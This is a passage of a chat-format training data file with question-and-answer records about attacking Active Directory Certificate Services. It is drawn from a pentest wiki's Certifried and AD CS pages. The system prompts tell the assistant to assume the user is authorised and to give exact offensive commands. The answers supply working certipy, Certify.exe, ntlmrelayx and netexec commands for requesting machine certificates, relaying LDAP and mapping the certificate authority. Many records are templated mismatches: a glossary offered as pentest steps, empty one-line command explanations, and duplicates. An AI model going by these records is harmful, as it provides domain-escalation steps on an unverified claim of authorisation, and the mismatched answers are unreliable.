\"$ADCS_HOST\" -ca 'ca_name' -template 'Machine'\n\n`\n\nThe certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate.\n\n> [!TIP]\n> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The -scheme flag can be used to set whether to use LDAP or LDAPS.\n\n=== Windows\n\nCertify (C#) can be used to request the certificate from Windows systems.\n\n`powershell\nCertify.exe request /ca:\"domain\\ca\" /template:\"Machine\"\n``\n\nThe certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate.\n\n:::", "metadata": {"corpus_index": 163, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certifried.md", "page_title": "Certifried", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Certifried - Obtaining a certificate"}, {"role": "assistant", "content": "The third and last step consists in getting the certificate of the targeted machine account ($DC_NAME in the previous command examples).\n\n::: tabs\n\n=== UNIX-like\n\nCertipy (Python) can be used to request the certificate from UNIX-like systems.\n\n``bash\ncertipy req -u 'compter$'@\"$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'Machine'\n\n`\n\nThe certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate.\n\n> [!TIP]\n> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The -scheme flag can be used to set whether to use LDAP or LDAPS.\n\n=== Windows\n\nCertify (C#) can be used to request the certificate from Windows systems.\n\n`powershell\nCertify.exe request /ca:\"domain\\ca\" /template:\"Machine\"\n``\n\nThe certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate.\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Certifried - Obtaining a certificate", "response": "The third and last step consists in getting the certificate of the targeted machine account ($DC_NAME in the previous command examples).\n\n::: tabs\n\n=== UNIX-like\n\nCertipy (Python) can be used to request the certificate from UNIX-like systems.\n\n``bash\ncertipy req -u 'compter$'@\"$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'Machine'\n\n`\n\nThe certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate.\n\n> [!TIP]\n> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The -scheme flag can be used to set whether to use LDAP or LDAPS.\n\n=== Windows\n\nCertify (C#) can be used to request the certificate from Windows systems.\n\n`powershell\nCertify.exe request /ca:\"domain\\ca\" /template:\"Machine\"\n``\n\nThe certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate.\n\n:::", "metadata": {"corpus_index": 163, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certifried.md", "page_title": "Certifried", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the certipy command for certifried - obtaining a certificate"}, {"role": "assistant", "content": "certipy req -u 'compter$'@\"$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'Machine'"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the certipy command for certifried - obtaining a certificate", "response": "certipy req -u 'compter$'@\"$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'Machine'", "metadata": {"corpus_index": 164, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certifried.md", "page_title": "Certifried", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "certipy"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Certifried - Obtaining a certificate"}, {"role": "assistant", "content": "certipy req -u 'compter$'@\"$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'Machine'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Certifried - Obtaining a certificate", "response": "certipy req -u 'compter$'@\"$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'Machine'", "metadata": {"corpus_index": 164, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certifried.md", "page_title": "Certifried", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `certipy req -u 'compter$'@\"$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'Machine'`?"}, {"role": "assistant", "content": "This command is used for certifried - obtaining a certificate. Obtaining a certificate"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `certipy req -u 'compter$'@\"$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'Machine'`?", "response": "This command is used for certifried - obtaining a certificate. Obtaining a certificate", "metadata": {"corpus_index": 164, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certifried.md", "page_title": "Certifried", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the Certify.exe syntax for certifried - obtaining a certificate?"}, {"role": "assistant", "content": "Certify.exe request /ca:\"domain\\ca\" /template:\"Machine\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the Certify.exe syntax for certifried - obtaining a certificate?", "response": "Certify.exe request /ca:\"domain\\ca\" /template:\"Machine\"", "metadata": {"corpus_index": 165, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certifried.md", "page_title": "Certifried", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Certify.exe"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Certifried - Obtaining a certificate?"}, {"role": "assistant", "content": "Certify.exe request /ca:\"domain\\ca\" /template:\"Machine\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Certifried - Obtaining a certificate?", "response": "Certify.exe request /ca:\"domain\\ca\" /template:\"Machine\"", "metadata": {"corpus_index": 165, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certifried.md", "page_title": "Certifried", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Certify.exe request /ca:\"domain\\ca\" /template:\"Machine\"`?"}, {"role": "assistant", "content": "This command is used for certifried - obtaining a certificate. Obtaining a certificate"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Certify.exe request /ca:\"domain\\ca\" /template:\"Machine\"`?", "response": "This command is used for certifried - obtaining a certificate. Obtaining a certificate", "metadata": {"corpus_index": 165, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certifried.md", "page_title": "Certifried", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Certificate Services (AD-CS) - Theory in the context of penetration testing"}, {"role": "assistant", "content": "> AD CS is Microsoft’s PKI implementation that provides everything from encrypting file systems, to digital signatures, to user authentication (a large focus of our research), and more. While AD CS is not installed by default for Active Directory environments, from our experience in enterprise environments it is widely deployed, and the security ramifications of misconfigured certificate service instances are enormous. (specterops.io)\n\nIn their research papers, Will Schroeder and Lee Christensen shared their research on AD CS and identified multiple theft, escalation and persistence vectors.\n\n* Credential theft (dubbed THEFT1 to THEFT5)\n* Account persistence (dubbed PERSIST1 to PERSIST3)\n* Domain escalation (dubbed ESC1 to ESC14)\n * based on misconfigured certificate templates\n * based on dangerous CA configuration\n * related to access control vulnerabilities\n * based on an NTLM relay vulnerability related to the web and RPC endpoints of AD CS\n* Domain persistence (dubbed DPERSIST1 to DPERSIST3)\n * by forging certificates with a stolen CA certificates\n * by trusting rogue CA certificates\n * by maliciously creating vulnerable access controls"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Certificate Services (AD-CS) - Theory in the context of penetration testing", "response": "> AD CS is Microsoft’s PKI implementation that provides everything from encrypting file systems, to digital signatures, to user authentication (a large focus of our research), and more. While AD CS is not installed by default for Active Directory environments, from our experience in enterprise environments it is widely deployed, and the security ramifications of misconfigured certificate service instances are enormous. (specterops.io)\n\nIn their research papers, Will Schroeder and Lee Christensen shared their research on AD CS and identified multiple theft, escalation and persistence vectors.\n\n* Credential theft (dubbed THEFT1 to THEFT5)\n* Account persistence (dubbed PERSIST1 to PERSIST3)\n* Domain escalation (dubbed ESC1 to ESC14)\n * based on misconfigured certificate templates\n * based on dangerous CA configuration\n * related to access control vulnerabilities\n * based on an NTLM relay vulnerability related to the web and RPC endpoints of AD CS\n* Domain persistence (dubbed DPERSIST1 to DPERSIST3)\n * by forging certificates with a stolen CA certificates\n * by trusting rogue CA certificates\n * by maliciously creating vulnerable access controls", "metadata": {"corpus_index": 166, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/index.md", "page_title": "Certificate Services (AD-CS)", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Certificate Services (AD-CS) - Theory"}, {"role": "assistant", "content": "> AD CS is Microsoft’s PKI implementation that provides everything from encrypting file systems, to digital signatures, to user authentication (a large focus of our research), and more. While AD CS is not installed by default for Active Directory environments, from our experience in enterprise environments it is widely deployed, and the security ramifications of misconfigured certificate service instances are enormous. (specterops.io)\n\nIn their research papers, Will Schroeder and Lee Christensen shared their research on AD CS and identified multiple theft, escalation and persistence vectors.\n\n* Credential theft (dubbed THEFT1 to THEFT5)\n* Account persistence (dubbed PERSIST1 to PERSIST3)\n* Domain escalation (dubbed ESC1 to ESC14)\n * based on misconfigured certificate templates\n * based on dangerous CA configuration\n * related to access control vulnerabilities\n * based on an NTLM relay vulnerability related to the web and RPC endpoints of AD CS\n* Domain persistence (dubbed DPERSIST1 to DPERSIST3)\n * by forging certificates with a stolen CA certificates\n * by trusting rogue CA certificates\n * by maliciously creating vulnerable access controls"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Certificate Services (AD-CS) - Theory", "response": "> AD CS is Microsoft’s PKI implementation that provides everything from encrypting file systems, to digital signatures, to user authentication (a large focus of our research), and more. While AD CS is not installed by default for Active Directory environments, from our experience in enterprise environments it is widely deployed, and the security ramifications of misconfigured certificate service instances are enormous. (specterops.io)\n\nIn their research papers, Will Schroeder and Lee Christensen shared their research on AD CS and identified multiple theft, escalation and persistence vectors.\n\n* Credential theft (dubbed THEFT1 to THEFT5)\n* Account persistence (dubbed PERSIST1 to PERSIST3)\n* Domain escalation (dubbed ESC1 to ESC14)\n * based on misconfigured certificate templates\n * based on dangerous CA configuration\n * related to access control vulnerabilities\n * based on an NTLM relay vulnerability related to the web and RPC endpoints of AD CS\n* Domain persistence (dubbed DPERSIST1 to DPERSIST3)\n * by forging certificates with a stolen CA certificates\n * by trusting rogue CA certificates\n * by maliciously creating vulnerable access controls", "metadata": {"corpus_index": 166, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/index.md", "page_title": "Certificate Services (AD-CS)", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Certificate Services (AD-CS) - Escalation techniques"}, {"role": "assistant", "content": "- ESC1 \"template-allows-san\"\n- ESC2 \"any-purpose-eku\"\n- ESC3 \"certificate-agent-eku\"\n- ESC4 \"certificate-templates\"\n- ESC5 \"other-objects\"\n- ESC6 \"editf_attributesubjectaltname2\"\n- ESC7 \"certificate-authority\"\n- ESC8 \"web-endpoint-esc8\n- ESC9 \"no-security-extension\"\n- ESC10 \"weak-certificate-mapping\"\n- ESC11 \"rpc-endpoint\"\n- ESC12 \"shell-access-to-adcs-ca-with-yubihsm\"\n- ESC13 \"issuance-policiy-with-privileged-group-linked\"\n- ESC14 \"weak-explicit-mapping\"\n- ESC15 \"arbitrary application policy\"\n- Certifried.md"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Certificate Services (AD-CS) - Escalation techniques", "response": "- ESC1 \"template-allows-san\"\n- ESC2 \"any-purpose-eku\"\n- ESC3 \"certificate-agent-eku\"\n- ESC4 \"certificate-templates\"\n- ESC5 \"other-objects\"\n- ESC6 \"editf_attributesubjectaltname2\"\n- ESC7 \"certificate-authority\"\n- ESC8 \"web-endpoint-esc8\n- ESC9 \"no-security-extension\"\n- ESC10 \"weak-certificate-mapping\"\n- ESC11 \"rpc-endpoint\"\n- ESC12 \"shell-access-to-adcs-ca-with-yubihsm\"\n- ESC13 \"issuance-policiy-with-privileged-group-linked\"\n- ESC14 \"weak-explicit-mapping\"\n- ESC15 \"arbitrary application policy\"\n- Certifried.md", "metadata": {"corpus_index": 167, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/index.md", "page_title": "Certificate Services (AD-CS)", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Certificate Services (AD-CS) - Escalation techniques"}, {"role": "assistant", "content": "- ESC1 \"template-allows-san\"\n- ESC2 \"any-purpose-eku\"\n- ESC3 \"certificate-agent-eku\"\n- ESC4 \"certificate-templates\"\n- ESC5 \"other-objects\"\n- ESC6 \"editf_attributesubjectaltname2\"\n- ESC7 \"certificate-authority\"\n- ESC8 \"web-endpoint-esc8\n- ESC9 \"no-security-extension\"\n- ESC10 \"weak-certificate-mapping\"\n- ESC11 \"rpc-endpoint\"\n- ESC12 \"shell-access-to-adcs-ca-with-yubihsm\"\n- ESC13 \"issuance-policiy-with-privileged-group-linked\"\n- ESC14 \"weak-explicit-mapping\"\n- ESC15 \"arbitrary application policy\"\n- Certifried.md"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Certificate Services (AD-CS) - Escalation techniques", "response": "- ESC1 \"template-allows-san\"\n- ESC2 \"any-purpose-eku\"\n- ESC3 \"certificate-agent-eku\"\n- ESC4 \"certificate-templates\"\n- ESC5 \"other-objects\"\n- ESC6 \"editf_attributesubjectaltname2\"\n- ESC7 \"certificate-authority\"\n- ESC8 \"web-endpoint-esc8\n- ESC9 \"no-security-extension\"\n- ESC10 \"weak-certificate-mapping\"\n- ESC11 \"rpc-endpoint\"\n- ESC12 \"shell-access-to-adcs-ca-with-yubihsm\"\n- ESC13 \"issuance-policiy-with-privileged-group-linked\"\n- ESC14 \"weak-explicit-mapping\"\n- ESC15 \"arbitrary application policy\"\n- Certifried.md", "metadata": {"corpus_index": 167, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/index.md", "page_title": "Certificate Services (AD-CS)", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Certificate Services (AD-CS) - Terminology?"}, {"role": "assistant", "content": "> * PKI (Public Key Infrastructure) — a system to manage certificates/public key encryption\n> * AD CS (Active Directory Certificate Services) — Microsoft’s PKI implementation\n> * CA (Certificate Authority) — PKI server that issues certificates\n> * Enterprise CA — CA integrated with AD (as opposed to a standalone CA), offers certificate templates\n> * Certificate Template — a collection of settings and policies that defines the contents of a certificate issued by an enterprise CA\n> * CSR (Certificate Signing Request) — a message sent to a CA to request a signed certificate\n> * EKU (Extended/Enhanced Key Usage) — one or more object identifiers (OIDs) that define how a certificate can be used\n> * Application Policy — this does the same thing as EKUs, but with a few more options. Specific to Windows environments\n>\n> (specterops.io)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Certificate Services (AD-CS) - Terminology?", "response": "> * PKI (Public Key Infrastructure) — a system to manage certificates/public key encryption\n> * AD CS (Active Directory Certificate Services) — Microsoft’s PKI implementation\n> * CA (Certificate Authority) — PKI server that issues certificates\n> * Enterprise CA — CA integrated with AD (as opposed to a standalone CA), offers certificate templates\n> * Certificate Template — a collection of settings and policies that defines the contents of a certificate issued by an enterprise CA\n> * CSR (Certificate Signing Request) — a message sent to a CA to request a signed certificate\n> * EKU (Extended/Enhanced Key Usage) — one or more object identifiers (OIDs) that define how a certificate can be used\n> * Application Policy — this does the same thing as EKUs, but with a few more options. Specific to Windows environments\n>\n> (specterops.io)", "metadata": {"corpus_index": 168, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/index.md", "page_title": "Certificate Services (AD-CS)", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Certificate Services (AD-CS) - Terminology during a pentest?"}, {"role": "assistant", "content": "> * PKI (Public Key Infrastructure) — a system to manage certificates/public key encryption\n> * AD CS (Active Directory Certificate Services) — Microsoft’s PKI implementation\n> * CA (Certificate Authority) — PKI server that issues certificates\n> * Enterprise CA — CA integrated with AD (as opposed to a standalone CA), offers certificate templates\n> * Certificate Template — a collection of settings and policies that defines the contents of a certificate issued by an enterprise CA\n> * CSR (Certificate Signing Request) — a message sent to a CA to request a signed certificate\n> * EKU (Extended/Enhanced Key Usage) — one or more object identifiers (OIDs) that define how a certificate can be used\n> * Application Policy — this does the same thing as EKUs, but with a few more options. Specific to Windows environments\n>\n> (specterops.io)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Certificate Services (AD-CS) - Terminology during a pentest?", "response": "> * PKI (Public Key Infrastructure) — a system to manage certificates/public key encryption\n> * AD CS (Active Directory Certificate Services) — Microsoft’s PKI implementation\n> * CA (Certificate Authority) — PKI server that issues certificates\n> * Enterprise CA — CA integrated with AD (as opposed to a standalone CA), offers certificate templates\n> * Certificate Template — a collection of settings and policies that defines the contents of a certificate issued by an enterprise CA\n> * CSR (Certificate Signing Request) — a message sent to a CA to request a signed certificate\n> * EKU (Extended/Enhanced Key Usage) — one or more object identifiers (OIDs) that define how a certificate can be used\n> * Application Policy — this does the same thing as EKUs, but with a few more options. Specific to Windows environments\n>\n> (specterops.io)", "metadata": {"corpus_index": 168, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/index.md", "page_title": "Certificate Services (AD-CS)", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Certificate Services (AD-CS) - Recon work?"}, {"role": "assistant", "content": "While AD CS offers attackers a wide range of exploitation and persistence scenarios, this set of services is not always installed, and when it is, it is a requirement to identify its different parts in the domain."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Certificate Services (AD-CS) - Recon work?", "response": "While AD CS offers attackers a wide range of exploitation and persistence scenarios, this set of services is not always installed, and when it is, it is a requirement to identify its different parts in the domain.", "metadata": {"corpus_index": 169, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/index.md", "page_title": "Certificate Services (AD-CS)", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Certificate Services (AD-CS) - Recon?"}, {"role": "assistant", "content": "While AD CS offers attackers a wide range of exploitation and persistence scenarios, this set of services is not always installed, and when it is, it is a requirement to identify its different parts in the domain."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Certificate Services (AD-CS) - Recon?", "response": "While AD CS offers attackers a wide range of exploitation and persistence scenarios, this set of services is not always installed, and when it is, it is a requirement to identify its different parts in the domain.", "metadata": {"corpus_index": 169, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/index.md", "page_title": "Certificate Services (AD-CS)", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Certificate Services (AD-CS) - Cert Publishers?"}, {"role": "assistant", "content": "An initial indicator is the \"Cert Publishers\" built-in group whose members usually are the servers where AD CS is installed (i.e. PKI/CA).\n\n* From UNIX-like systems: net rpc group members \"Cert Publishers\" -U \"DOMAIN\"/\"User\"%\"Password\" -S \"DomainController\"\n* From Windows systems: net group \"Cert Publishers\" /domain"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Certificate Services (AD-CS) - Cert Publishers?", "response": "An initial indicator is the \"Cert Publishers\" built-in group whose members usually are the servers where AD CS is installed (i.e. PKI/CA).\n\n* From UNIX-like systems: net rpc group members \"Cert Publishers\" -U \"DOMAIN\"/\"User\"%\"Password\" -S \"DomainController\"\n* From Windows systems: net group \"Cert Publishers\" /domain", "metadata": {"corpus_index": 170, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/index.md", "page_title": "Certificate Services (AD-CS)", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Certificate Services (AD-CS) - Cert Publishers"}, {"role": "assistant", "content": "An initial indicator is the \"Cert Publishers\" built-in group whose members usually are the servers where AD CS is installed (i.e. PKI/CA).\n\n* From UNIX-like systems: net rpc group members \"Cert Publishers\" -U \"DOMAIN\"/\"User\"%\"Password\" -S \"DomainController\"\n* From Windows systems: net group \"Cert Publishers\" /domain"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Certificate Services (AD-CS) - Cert Publishers", "response": "An initial indicator is the \"Cert Publishers\" built-in group whose members usually are the servers where AD CS is installed (i.e. PKI/CA).\n\n* From UNIX-like systems: net rpc group members \"Cert Publishers\" -U \"DOMAIN\"/\"User\"%\"Password\" -S \"DomainController\"\n* From Windows systems: net group \"Cert Publishers\" /domain", "metadata": {"corpus_index": 170, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/index.md", "page_title": "Certificate Services (AD-CS)", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Certificate Services (AD-CS) - pKIEnrollmentService objects"}, {"role": "assistant", "content": "Alternatively, information like the PKI's CA and DNS names can be gathered through LDAP.\n\n::: tabs\n\n=== netexec\n\nnetexec's adcs module (Python) can be used to find PKI enrollment services in AD.\n\n``bash\nnetexec ldap 'domaincontroller' -d 'domain' -u 'user' -p 'password' -M adcs\n`\n\n=== windapsearch\n\nwindapsearch (Python) can be used to manually to the LDAP query.\n\n`bash\nwindapsearch -m custom --filter '(objectCategory=pKIEnrollmentService)' --base 'CN=Configuration,DC=domain,DC=local' --attrs dn,dnshostname --dc 'domaincontroller' -d 'domain.local' -u 'user' -p 'password'\n`\n\n=== ntlmrelayx\n\nWith Impacket's ntlmrelayx (Python), thanks to SAERXCIT (PR#1214), it is possible to gather information regarding ADCS like the name and host of the CA, the certificate templates enrollment rights for those allowing client authentication and not requiring manager approval, etc. With ntlmrelayx, these information can be gathered through a relayed LDAP session.\n\n`bash\nntlmrelayx -t \"ldap://domaincontroller\" --dump-adcs\n``\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Certificate Services (AD-CS) - pKIEnrollmentService objects", "response": "Alternatively, information like the PKI's CA and DNS names can be gathered through LDAP.\n\n::: tabs\n\n=== netexec\n\nnetexec's adcs module (Python) can be used to find PKI enrollment services in AD.\n\n``bash\nnetexec ldap 'domaincontroller' -d 'domain' -u 'user' -p 'password' -M adcs\n`\n\n=== windapsearch\n\nwindapsearch (Python) can be used to manually to the LDAP query.\n\n`bash\nwindapsearch -m custom --filter '(objectCategory=pKIEnrollmentService)' --base 'CN=Configuration,DC=domain,DC=local' --attrs dn,dnshostname --dc 'domaincontroller' -d 'domain.local' -u 'user' -p 'password'\n`\n\n=== ntlmrelayx\n\nWith Impacket's ntlmrelayx (Python), thanks to SAERXCIT (PR#1214), it is possible to gather information regarding ADCS like the name and host of the CA, the certificate templates enrollment rights for those allowing client authentication and not requiring manager approval, etc. With ntlmrelayx, these information can be gathered through a relayed LDAP session.\n\n`bash\nntlmrelayx -t \"ldap://domaincontroller\" --dump-adcs\n``\n\n:::", "metadata": {"corpus_index": 171, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/index.md", "page_title": "Certificate Services (AD-CS)", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Certificate Services (AD-CS) - pKIEnrollmentService objects"}, {"role": "assistant", "content": "Alternatively, information like the PKI's CA and DNS names can be gathered through LDAP.\n\n::: tabs\n\n=== netexec\n\nnetexec's adcs module (Python) can be used to find PKI enrollment services in AD.\n\n``bash\nnetexec ldap 'domaincontroller' -d 'domain' -u 'user' -p 'password' -M adcs\n`\n\n=== windapsearch\n\nwindapsearch (Python) can be used to manually to the LDAP query.\n\n`bash\nwindapsearch -m custom --filter '(objectCategory=pKIEnrollmentService)' --base 'CN=Configuration,DC=domain,DC=local' --attrs dn,dnshostname --dc 'domaincontroller' -d 'domain.local' -u 'user' -p 'password'\n`\n\n=== ntlmrelayx\n\nWith Impacket's ntlmrelayx (Python), thanks to SAERXCIT (PR#1214), it is possible to gather information regarding ADCS like the name and host of the CA, the certificate templates enrollment rights for those allowing client authentication and not requiring manager approval, etc. With ntlmrelayx, these information can be gathered through a relayed LDAP session.\n\n`bash\nntlmrelayx -t \"ldap://domaincontroller\" --dump-adcs\n``\n\n:::"}], "system": 